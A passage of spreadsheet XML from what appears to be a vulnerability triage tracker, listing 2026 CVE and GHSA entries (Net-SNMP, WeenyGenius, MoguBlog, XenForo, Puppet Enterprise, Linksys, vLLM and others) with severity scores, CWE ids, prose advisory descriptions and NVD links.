    <row r="199">
      <c r="A199" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B199" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C199" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89147</t>
        </is>
      </c>
      <c r="D199" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E199" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F199" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G199" s="5" t="inlineStr"/>
      <c r="H199" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I199" s="5" t="inlineStr"/>
      <c r="J199" s="5" t="inlineStr"/>
      <c r="K199" s="5" t="inlineStr"/>
      <c r="L199" s="5" t="inlineStr"/>
      <c r="M199" s="5" t="inlineStr"/>
      <c r="N199" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O199" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P199" s="5" t="inlineStr"/>
      <c r="Q199" s="5" t="inlineStr">
        <is>
          <t>CWE-1088, CWE-400</t>
        </is>
      </c>
      <c r="R199" s="5" t="inlineStr">
        <is>
          <t>Net-SNMP through 5.9.5.2 contains a denial of service vulnerability in the SMUX module where smux_accept() performs an unauthenticated blocking read without timeout on newly accepted connections. An unauthenticated remote client can connect to the SMUX listener and send no data, causing the single-threaded snmpd main loop to block indefinitely and suspend all SNMP processing.</t>
        </is>
      </c>
      <c r="S199" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89147</t>
        </is>
      </c>
    </row>
    <row r="200">
      <c r="A200" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B200" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C200" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89174</t>
        </is>
      </c>
      <c r="D200" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E200" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F200" s="5" t="inlineStr">
        <is>
          <t>twcert@cert.org.tw</t>
        </is>
      </c>
      <c r="G200" s="5" t="inlineStr"/>
      <c r="H200" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I200" s="5" t="inlineStr"/>
      <c r="J200" s="5" t="inlineStr"/>
      <c r="K200" s="5" t="inlineStr"/>
      <c r="L200" s="5" t="inlineStr"/>
      <c r="M200" s="5" t="inlineStr"/>
      <c r="N200" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O200" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P200" s="5" t="inlineStr"/>
      <c r="Q200" s="5" t="inlineStr">
        <is>
          <t>CWE-307</t>
        </is>
      </c>
      <c r="R200" s="5" t="inlineStr">
        <is>
          <t>Smart Video Intercom System developed by Kingdom Communication Associated has a Missing Brute-force Protection vulnerability. Unauthenticated remote attackers can gain access to valid accounts through a large number of login attempts.</t>
        </is>
      </c>
      <c r="S200" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89174</t>
        </is>
      </c>
    </row>
    <row r="201">
      <c r="A201" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B201" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C201" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89176</t>
        </is>
      </c>
      <c r="D201" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E201" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F201" s="5" t="inlineStr">
        <is>
          <t>twcert@cert.org.tw</t>
        </is>
      </c>
      <c r="G201" s="5" t="inlineStr"/>
      <c r="H201" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I201" s="5" t="inlineStr"/>
      <c r="J201" s="5" t="inlineStr"/>
      <c r="K201" s="5" t="inlineStr"/>
      <c r="L201" s="5" t="inlineStr"/>
      <c r="M201" s="5" t="inlineStr"/>
      <c r="N201" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O201" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P201" s="5" t="inlineStr"/>
      <c r="Q201" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="R201" s="5" t="inlineStr">
        <is>
          <t>WeenyGenius, a computer lab management system developed by Howyar Technologies, has a Missing Authentication vulnerability. Unauthenticated attackers on the same network can easily spoof student or teacher endpoints. Impersonating a student can disrupt normal classroom operations, whereas impersonating a teacher can induce student computers to initiate connections, thereby gaining remote control over the student endpoints.</t>
        </is>
      </c>
      <c r="S201" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89176</t>
        </is>
      </c>
    </row>
    <row r="202">
      <c r="A202" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B202" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C202" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89177</t>
        </is>
      </c>
      <c r="D202" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E202" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F202" s="5" t="inlineStr">
        <is>
          <t>twcert@cert.org.tw</t>
        </is>
      </c>
      <c r="G202" s="5" t="inlineStr"/>
      <c r="H202" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I202" s="5" t="inlineStr"/>
      <c r="J202" s="5" t="inlineStr"/>
      <c r="K202" s="5" t="inlineStr"/>
      <c r="L202" s="5" t="inlineStr"/>
      <c r="M202" s="5" t="inlineStr"/>
      <c r="N202" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O202" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P202" s="5" t="inlineStr"/>
      <c r="Q202" s="5" t="inlineStr">
        <is>
          <t>CWE-757</t>
        </is>
      </c>
      <c r="R202" s="5" t="inlineStr">
        <is>
          <t>WeenyGenius, a computer lab management system by Howyar Technologies, has a Use of Insecure Protocol vulnerability. Due to the reliance on ZMTP Null mode, unauthenticated attackers on the same network can capture packets to leak transmitted data, or perform replay attacks with forged commands to disrupt classroom operations.</t>
        </is>
      </c>
      <c r="S202" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89177</t>
        </is>
      </c>
    </row>
    <row r="203">
      <c r="A203" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B203" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C203" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89178</t>
        </is>
      </c>
      <c r="D203" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E203" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F203" s="5" t="inlineStr">
        <is>
          <t>twcert@cert.org.tw</t>
        </is>
      </c>
      <c r="G203" s="5" t="inlineStr"/>
      <c r="H203" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I203" s="5" t="inlineStr"/>
      <c r="J203" s="5" t="inlineStr"/>
      <c r="K203" s="5" t="inlineStr"/>
      <c r="L203" s="5" t="inlineStr"/>
      <c r="M203" s="5" t="inlineStr"/>
      <c r="N203" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O203" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P203" s="5" t="inlineStr"/>
      <c r="Q203" s="5" t="inlineStr">
        <is>
          <t>CWE-940</t>
        </is>
      </c>
      <c r="R203" s="5" t="inlineStr">
        <is>
          <t>WeenyGenius, a computer lab management system by Howyar Technologies, has an Origin Validation Error vulnerability. Unauthenticated attackers on the same network can spoof the teacher workstation and send broadcast packets, causing student computers to attempt to establish a connection with the attacker.</t>
        </is>
      </c>
      <c r="S203" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89178</t>
        </is>
      </c>
    </row>
    <row r="204">
      <c r="A204" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B204" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C204" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89250</t>
        </is>
      </c>
      <c r="D204" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E204" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F204" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G204" s="5" t="inlineStr"/>
      <c r="H204" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I204" s="5" t="inlineStr"/>
      <c r="J204" s="5" t="inlineStr"/>
      <c r="K204" s="5" t="inlineStr"/>
      <c r="L204" s="5" t="inlineStr"/>
      <c r="M204" s="5" t="inlineStr"/>
      <c r="N204" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O204" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P204" s="5" t="inlineStr"/>
      <c r="Q204" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="R204" s="5" t="inlineStr">
        <is>
          <t>WWBN AVideo through commit c3edcc274c389816d434acadac07ee78eaf330c1 contains an unauthenticated file read vulnerability in the getRecordedFile.php endpoint that streams recorded FLV files from the temporary directory. Attackers can request the endpoint with a known or guessed stream key to download recorded live video files without authentication or authorization checks.</t>
        </is>
      </c>
      <c r="S204" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89250</t>
        </is>
      </c>
    </row>
    <row r="205">
      <c r="A205" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B205" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C205" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89260</t>
        </is>
      </c>
      <c r="D205" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E205" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F205" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G205" s="5" t="inlineStr"/>
      <c r="H205" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I205" s="5" t="inlineStr"/>
      <c r="J205" s="5" t="inlineStr"/>
      <c r="K205" s="5" t="inlineStr"/>
      <c r="L205" s="5" t="inlineStr"/>
      <c r="M205" s="5" t="inlineStr"/>
      <c r="N205" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O205" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P205" s="5" t="inlineStr"/>
      <c r="Q205" s="5" t="inlineStr">
        <is>
          <t>CWE-611</t>
        </is>
      </c>
      <c r="R205" s="5" t="inlineStr">
        <is>
          <t>MoguBlog through 6.2 contains an XML external entity injection vulnerability in the WeChat callback handler at POST /wechat/wechatCheck. The WechatRestApi.index() method passes the raw request body to SignUtil.xmlToMap(), which uses an unhardened dom4j SAXReader without DTD or external-entity restrictions. Unauthenticated remote attackers can submit DOCTYPE declarations with external parameter entities to read arbitrary local files or trigger outbound HTTP requests, with resolved entities reflected in error responses.</t>
        </is>
      </c>
      <c r="S205" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89260</t>
        </is>
      </c>
    </row>
    <row r="206">
      <c r="A206" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B206" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C206" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89262</t>
        </is>
      </c>
      <c r="D206" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E206" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F206" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G206" s="5" t="inlineStr"/>
      <c r="H206" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I206" s="5" t="inlineStr"/>
      <c r="J206" s="5" t="inlineStr"/>
      <c r="K206" s="5" t="inlineStr"/>
      <c r="L206" s="5" t="inlineStr"/>
      <c r="M206" s="5" t="inlineStr"/>
      <c r="N206" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O206" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P206" s="5" t="inlineStr"/>
      <c r="Q206" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="R206" s="5" t="inlineStr">
        <is>
          <t>MoguBlog through 6.2 contains an authorization bypass vulnerability in the comment deletion endpoint that performs ownership checks against request-body fields instead of the authenticated principal. Attackers can delete arbitrary comments and their replies by supplying comment UIDs and author UIDs obtained from unauthenticated listing endpoints.</t>
        </is>
      </c>
      <c r="S206" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89262</t>
        </is>
      </c>
    </row>
    <row r="207">
      <c r="A207" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B207" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C207" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90444</t>
        </is>
      </c>
      <c r="D207" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E207" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F207" s="5" t="inlineStr">
        <is>
          <t>ics-cert@hq.dhs.gov</t>
        </is>
      </c>
      <c r="G207" s="5" t="inlineStr"/>
      <c r="H207" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I207" s="5" t="inlineStr"/>
      <c r="J207" s="5" t="inlineStr"/>
      <c r="K207" s="5" t="inlineStr"/>
      <c r="L207" s="5" t="inlineStr"/>
      <c r="M207" s="5" t="inlineStr"/>
      <c r="N207" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O207" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P207" s="5" t="inlineStr"/>
      <c r="Q207" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="R207" s="5" t="inlineStr">
        <is>
          <t>A file-transfer interface that requires valid credentials accepts attacker-controlled filenames without restricting shell metacharacters. An automated process later constructs and runs a system command using the uploaded file's name, allowing an authenticated attacker to embed and execute arbitrary operating system commands with the privileges of that process. This allows an attacker to read and modify ingested log data, and could provide a foothold for further movement within the internal network.</t>
        </is>
      </c>
      <c r="S207" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90444</t>
        </is>
      </c>
    </row>
    <row r="208">
      <c r="A208" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B208" s="5" t="inlineStr">
        <is>
          <t>Updated</t>
        </is>
      </c>
      <c r="C208" s="5" t="inlineStr">
        <is>
          <t>GHSA-78fp-cf4h-g36p</t>
        </is>
      </c>
      <c r="D208" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E208" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F208" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="G208" s="5" t="inlineStr"/>
      <c r="H208" s="5" t="inlineStr"/>
      <c r="I208" s="5" t="inlineStr"/>
      <c r="J208" s="5" t="inlineStr"/>
      <c r="K208" s="5" t="inlineStr"/>
      <c r="L208" s="5" t="inlineStr">
        <is>
          <t>pip:vllm</t>
        </is>
      </c>
      <c r="M208" s="5" t="inlineStr">
        <is>
          <t>0.13.0</t>
        </is>
      </c>
      <c r="N208" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="O208" s="5" t="inlineStr"/>
      <c r="P208" s="5" t="inlineStr"/>
      <c r="Q208" s="5" t="inlineStr">
        <is>
          <t>CWE-20, CWE-787</t>
        </is>
      </c>
      <c r="R208" s="5" t="inlineStr">
        <is>
          <t>### Duplicate Advisory
This advisory has been withdrawn because it is a duplicate of GHSA-mcmc-2m55-j8jj. This link is maintained to preserve external references.
### Original Description
vLLM versions &gt;= 0.10.2 and &lt; 0.13.0 are missing sparse tensor validation in multimodal embeddings processing. Because PyTorch disables sparse tensor invariant checks by default, an attacker can submit crafted embedding requests with malformed (negative or out-of-bounds) tensor indices, when the prompt-embeds feature is enabled, to trigger crashes or resource exhaustion (denial of service), with potential for out-of-bounds/write-what-where memory corruption. This continues CVE-2025-62164, whose prior fix only disabled the feature by default rather than addressing the root cause.</t>
        </is>
      </c>
      <c r="S208" s="6" t="inlineStr">
        <is>
          <t>https://github.com/advisories/GHSA-78fp-cf4h-g36p</t>
        </is>
      </c>
    </row>
    <row r="209">
      <c r="A209" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B209" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C209" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-38058</t>
        </is>
      </c>
      <c r="D209" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="E209" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F209" s="5" t="inlineStr">
        <is>
          <t>ics-cert@hq.dhs.gov</t>
        </is>
      </c>
      <c r="G209" s="5" t="inlineStr"/>
      <c r="H209" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I209" s="5" t="inlineStr"/>
      <c r="J209" s="5" t="inlineStr"/>
      <c r="K209" s="5" t="inlineStr"/>
      <c r="L209" s="5" t="inlineStr"/>
      <c r="M209" s="5" t="inlineStr"/>
      <c r="N209" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O209" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P209" s="5" t="inlineStr"/>
      <c r="Q209" s="5" t="inlineStr">
        <is>
          <t>CWE-497</t>
        </is>
      </c>
      <c r="R209" s="5" t="inlineStr">
        <is>
          <t>The endpoint on the iDirect iQ200 VSAT terminal returns the complete device configuration as JSON, including the SECURITY section which contains MD5-crypt password hashes for the root SSH and web administration accounts. Any user with valid web credentials can extract these hashes and crack them offline using commodity hardware.</t>
        </is>
      </c>
      <c r="S209" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-38058</t>
        </is>
      </c>
    </row>
    <row r="210">
      <c r="A210" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B210" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C210" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-74239</t>
        </is>
      </c>
      <c r="D210" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="E210" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F210" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G210" s="5" t="inlineStr"/>
      <c r="H210" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I210" s="5" t="inlineStr"/>
      <c r="J210" s="5" t="inlineStr"/>
      <c r="K210" s="5" t="inlineStr">
        <is>
          <t>xenforo:xenforo</t>
        </is>
      </c>
      <c r="L210" s="5" t="inlineStr"/>
      <c r="M210" s="5" t="inlineStr"/>
      <c r="N210" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O210" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P210" s="5" t="inlineStr"/>
      <c r="Q210" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="R210" s="5" t="inlineStr">
        <is>
          <t>XenForo before 2.3.13 contains a path traversal vulnerability in the style archive importer on Windows deployments that allows authenticated non-super administrators with style permissions to write arbitrary files outside the intended extraction directory by using backslash-based traversal sequences in ZIP member names. Attackers can craft a malicious ZIP archive with backslash path separators that bypass forward-slash validation to write arbitrary bytes to any web-server-writable path, including the public web root, achieving persistent code execution as the web-server account.</t>
        </is>
      </c>
      <c r="S210" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-74239</t>
        </is>
      </c>
    </row>
    <row r="211">
      <c r="A211" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B211" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C211" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76199</t>
        </is>
      </c>
      <c r="D211" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="E211" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F211" s="5" t="inlineStr">
        <is>
          <t>psirt@adobe.com</t>
        </is>
      </c>
      <c r="G211" s="5" t="inlineStr"/>
      <c r="H211" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I211" s="5" t="inlineStr"/>
      <c r="J211" s="5" t="inlineStr"/>
      <c r="K211" s="5" t="inlineStr">
        <is>
          <t>adobe:photoshop, apple:macos, microsoft:windows</t>
        </is>
      </c>
      <c r="L211" s="5" t="inlineStr"/>
      <c r="M211" s="5" t="inlineStr"/>
      <c r="N211" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O211" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P211" s="5" t="inlineStr"/>
      <c r="Q211" s="5" t="inlineStr">
        <is>
          <t>CWE-427</t>
        </is>
      </c>
      <c r="R211" s="5" t="inlineStr">
        <is>
          <t>Photoshop Desktop is affected by an Uncontrolled Search Path Element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S211" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76199</t>
        </is>
      </c>
    </row>
    <row r="212">
      <c r="A212" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B212" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C212" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79698</t>
        </is>
      </c>
      <c r="D212" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="E212" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F212" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G212" s="5" t="inlineStr"/>
      <c r="H212" s="5" t="n">
        <v>0.017</v>
      </c>
      <c r="I212" s="5" t="inlineStr"/>
      <c r="J212" s="5" t="inlineStr"/>
      <c r="K212" s="5" t="inlineStr"/>
      <c r="L212" s="5" t="inlineStr"/>
      <c r="M212" s="5" t="inlineStr"/>
      <c r="N212" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O212" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="P212" s="5" t="inlineStr"/>
      <c r="Q212" s="5" t="inlineStr">
        <is>
          <t>CWE-74, CWE-77</t>
        </is>
      </c>
      <c r="R212" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was identified in Advantech WISE-6610-NB, WISE-6610-EB, WISE-6610-TB, WISE-6610-JB, WISE-6610-CB, WISE-6610-EL-NB, WISE-6610-EL-EB, WISE-6610-EL-TB, WISE-6610-EL-JB, WISE-6610-EL-CB, WISE-6610P-DEA, WISE-6610P-DNA and WISE-6610P-DTA 1.2.1_20251110. This vulnerability affects the function nodered_lib_apply of the component Node-RED Library. Such manipulation of the argument act leads to command injection. The attack can be launched remotely. The exploit is publicly available and might be used. Upgrading to version 1.2.4_20260821 is able to resolve this issue. It is advisable to upgrade the affected component. The vendor was contacted early, responded in a very professional manner and quickly released a fixed version of the affected product.</t>
        </is>
      </c>
      <c r="S212" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79698</t>
        </is>
      </c>
    </row>
    <row r="213">
      <c r="A213" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B213" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C213" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85979</t>
        </is>
      </c>
      <c r="D213" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="E213" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F213" s="5" t="inlineStr">
        <is>
          <t>security@puppet.com</t>
        </is>
      </c>
      <c r="G213" s="5" t="inlineStr"/>
      <c r="H213" s="5" t="n">
        <v>0.01</v>
      </c>
      <c r="I213" s="5" t="inlineStr"/>
      <c r="J213" s="5" t="inlineStr"/>
      <c r="K213" s="5" t="inlineStr"/>
      <c r="L213" s="5" t="inlineStr"/>
      <c r="M213" s="5" t="inlineStr"/>
      <c r="N213" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O213" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P213" s="5" t="inlineStr"/>
      <c r="Q213" s="5" t="inlineStr">
        <is>
          <t>CWE-20, CWE-269, CWE-78</t>
        </is>
      </c>
      <c r="R213" s="5" t="inlineStr">
        <is>
          <t>Affected versions of Puppet Enterprise contain a command injection vulnerability. An authenticated user with Puppet administrative privileges can inject arbitrary shell commands by providing a specially crafted value for this parameter, which is passed to a shell execution context without sufficient sanitization. Because the resulting commands are executed with root privileges, successful exploitation can lead to full compromise of the affected system. 
It affects Puppet Enterprise 2023.8.0 through 2023.8.10 and Puppet Enterprise 2025.0.0 through 2025.11.2.
This has been resolved in Puppet Enterprise 2023.8.11 and Puppet Enterprise 2025.11.3.</t>
        </is>
      </c>
      <c r="S213" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85979</t>
        </is>
      </c>
    </row>
    <row r="214">
      <c r="A214" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B214" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C214" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86299</t>
        </is>
      </c>
      <c r="D214" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="E214" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F214" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G214" s="5" t="inlineStr"/>
      <c r="H214" s="5" t="n">
        <v>0.02</v>
      </c>
      <c r="I214" s="5" t="inlineStr"/>
      <c r="J214" s="5" t="inlineStr"/>
      <c r="K214" s="5" t="inlineStr"/>
      <c r="L214" s="5" t="inlineStr"/>
      <c r="M214" s="5" t="inlineStr"/>
      <c r="N214" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O214" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="P214" s="5" t="inlineStr"/>
      <c r="Q214" s="5" t="inlineStr">
        <is>
          <t>CWE-77, CWE-78</t>
        </is>
      </c>
      <c r="R214" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was detected in Linksys RE7000 2.0.15. This affects the function platform_event_pingTest of the file /cgi-bin/json.cgi?PingTest of the component PingTest Handler. The manipulation of the argument pingTestIp/pingTestPktSize/pingTestTimes results in os command injection. The attack can be launched remotely. The exploit is now public and may be used.</t>
        </is>
      </c>
      <c r="S214" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86299</t>
        </is>
      </c>
    </row>
    <row r="215">
      <c r="A215" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B215" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C215" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86509</t>
        </is>
      </c>
      <c r="D215" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="E215" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F215" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G215" s="5" t="inlineStr"/>
      <c r="H215" s="5" t="n">
        <v>0.004</v>
      </c>
